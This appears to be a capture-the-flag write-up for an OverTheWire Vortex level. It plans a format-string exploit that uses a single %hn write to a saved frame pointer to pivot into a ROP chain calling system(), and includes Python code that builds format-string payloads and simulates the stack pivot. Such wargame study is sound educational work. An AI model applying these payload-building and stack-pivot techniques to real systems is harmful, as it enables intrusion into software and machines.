Continuing the vortex series here. This is Vortex #13.
1: vortex 12
How big is your shellcode? This level has a non-executable stack. You must login to vortex.labs.overthewire.org to complete this level.
Okay, so we grab the binary and take a look; we see two functions.
So this is a format string bug, and the string we control is 0x14 bytes long. Also, we are only allowed to use specific characters. The allowed characters are
We need to control execution. After the loop there is a call to free(), so we could overwrite its GOT entry and hijack control that way, but as noted we are only allowed 0x14 bytes, and that is not enough for a nice two-write (writing the low two bytes of free's GOT entry, then the high two, with something like %Xx%114$hn%Yx%115$hn). Also, all environment variables and arguments are zeroed. We can still use AUXV to put our data there (the stack is non-executable, so shellcode there would not run anyway), but we still need a way to control execution. Another option is a single write that changes a saved frame pointer and turns it into a ROP: from vuln() we overwrite the saved ebp, so when vuln() does leave; ret and returns to main, main's own leave; ret moves our value into esp and pops its return address from AUXV-controlled data, and we can ROP from there.
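To make the size argument concrete, here is an added Python example (not code from the writeup): it builds a %hn write in the "%<pad>x%<slot>$hn" form, checks it against the 0x14-byte limit and a character whitelist, and emulates printf's byte counting to confirm what the write would store. The slots 114 and 115 come from the payload sketch above; the target values, the whitelist and the argument list fed to the emulator are assumptions, since the real allowed-character list is not captured on this page.

```python
import re

MAX_LEN = 0x14                      # the level's limit on our string
ALLOWED = set("0123456789%$hnx")    # assumption: stand-in for the real whitelist


def hn_write(slot, value, already_printed=0):
    """Return '%<pad>x%<slot>$hn' that stores `value` (low 16 bits) through the
    pointer found at format argument `slot`.  %hn stores the number of bytes
    printed so far, so we pad until that count equals `value` modulo 2**16.
    Caveat: a width is a minimum; the argument eaten by %x must print in no
    more than `pad` characters, which holds whenever it is a small number."""
    pad = (value - already_printed) % 0x10000
    return (f"%{pad}x" if pad else "") + f"%{slot}$hn"


def fits(payload):
    """True when the payload obeys both the length budget and the whitelist."""
    return len(payload) <= MAX_LEN and set(payload) <= ALLOWED


def two_write(slot_lo, slot_hi, address):
    """The 'nice' two-write from the text: low half first, then the high half,
    remembering that the second %hn sees the bytes already printed."""
    lo, hi = address & 0xffff, (address >> 16) & 0xffff
    return hn_write(slot_lo, lo) + hn_write(slot_hi, hi, already_printed=lo)


_TOKEN = re.compile(r"%(\d*)x|%(\d+)\$hn")


def simulate(payload, args):
    """Emulate printf's byte counting for payloads made only of the two
    directives above.  `args` is the list of format arguments; '%<w>x' consumes
    them in order, '%<slot>$hn' records the running count (16 bits) per slot."""
    count, next_arg, pos, writes = 0, 0, 0, {}
    for m in _TOKEN.finditer(payload):
        count += m.start() - pos            # literal bytes between directives
        pos = m.end()
        if m.group(2) is not None:
            writes[int(m.group(2))] = count & 0xffff
        else:
            width = int(m.group(1) or 0)
            count += max(width, len(f"{args[next_arg]:x}"))
            next_arg += 1
    count += len(payload) - pos
    return count, writes


if __name__ == "__main__":
    stack = [0] * 120                        # constructed: small values in the slots
    single = hn_write(114, 0x8048)
    print(single, len(single), fits(single), simulate(single, stack)[1])
    double = two_write(114, 115, 0x08048000)
    print(double, len(double), fits(double), simulate(double, stack)[1])
```

A single 16-bit write comes in at 14 characters and fits; the two-write needs two widths and two slot numbers and lands at 28 characters, which is why the text gives up on patching free's GOT entry directly and looks for something a single write can redirect.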
- We build all the data (the ROP chain, its arguments, etc.) in AUXV using symlinks: argv and the environment are zeroed, but the path the binary is executed through still lands on the stack as the AT_EXECFN string, so the symlink name is our way of getting bytes there.
- We use the format string to write through a pointer we placed in this AUXV data (it points at vuln()'s saved ebp); the value written makes the saved ebp point to our ROP chain, also in AUXV. The chain is reached when vuln() does leave; ret and then main does leave; ret.
- Our ROP chain calls system(), with the stack laid out so that its argument points to a string in libc that contains ./0123456789......
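To show how the single write turns into a pivot, here is an added Python example (not the writeup's own code) that models 32-bit leave; ret and runs vuln()'s epilogue followed by main()'s, once with the saved ebp untouched and once with its low 16 bits replaced, which is all a lone %hn can change. Every address below is a made-up stand-in for the real stack, AUXV and libc layout; the constraint it illustrates is that the fake frame has to sit in the same 64 KiB of stack as the original saved ebp, which the AUXV area on the stack satisfies.

```python
# Constructed addresses: stand-ins for the real stack, AUXV and libc layout.
VULN_FRAME = 0xbfffe680      # vuln()'s ebp: [saved ebp][ret into main]
MAIN_FRAME = 0xbfffe6c8      # main()'s ebp: [saved ebp][ret into libc]
RET_IN_MAIN = 0x08048520     # where vuln() returns inside main()
RET_IN_LIBC = 0xb7e3b4d3     # where main() would normally return
FAKE_FRAME = 0xbffff100      # our data in the AUXV area (same 64 KiB of stack)
SYSTEM = 0xb7e5a8b0          # hypothetical address of system() in libc
CMD_STR = 0xb7f8c0a0         # hypothetical "./0123456789..." string inside libc


def leave_ret(mem, ebp):
    """x86 'leave; ret': mov esp, ebp ; pop ebp ; ret.  Returns (eip, esp, ebp)."""
    esp = ebp
    ebp = mem[esp]; esp += 4
    eip = mem[esp]; esp += 4
    return eip, esp, ebp


def build_memory(overwrite_saved_ebp):
    """Lay out vuln()'s frame, main()'s frame and the fake frame in AUXV data."""
    mem = {
        VULN_FRAME: MAIN_FRAME, VULN_FRAME + 4: RET_IN_MAIN,
        MAIN_FRAME: 0x00000000, MAIN_FRAME + 4: RET_IN_LIBC,
        FAKE_FRAME: 0x41414141,        # lands in ebp after main's pop; unused
        FAKE_FRAME + 4: SYSTEM,        # main's 'ret' pops this as eip
        FAKE_FRAME + 8: 0x42424242,    # return address system() would use
        FAKE_FRAME + 12: CMD_STR,      # system()'s argument, read at [esp+4]
    }
    if overwrite_saved_ebp:
        # The single %hn write: only the low 16 bits of the saved ebp change.
        mem[VULN_FRAME] = (mem[VULN_FRAME] & 0xffff0000) | (FAKE_FRAME & 0xffff)
    return mem


def run_epilogues(overwrite_saved_ebp):
    """Run vuln()'s epilogue, then main()'s, and report where main's ret goes
    and what the callee would see as its first argument."""
    mem = build_memory(overwrite_saved_ebp)
    eip, esp, ebp = leave_ret(mem, VULN_FRAME)
    assert eip == RET_IN_MAIN            # vuln() still returns into main normally
    eip, esp, ebp = leave_ret(mem, ebp)  # main's leave now uses the ebp we chose
    return eip, mem.get(esp + 4)


if __name__ == "__main__":
    print("untouched:", [hex(v) if v else v for v in run_epilogues(False)])
    print("pivoted:  ", [hex(v) for v in run_epilogues(True)])
```

With the saved ebp untouched, main's ret goes back into libc as usual; with the low half patched, main's leave makes esp point at the fake frame, its ret pops system(), and system() finds the libc string as its argument exactly as the last bullet describes.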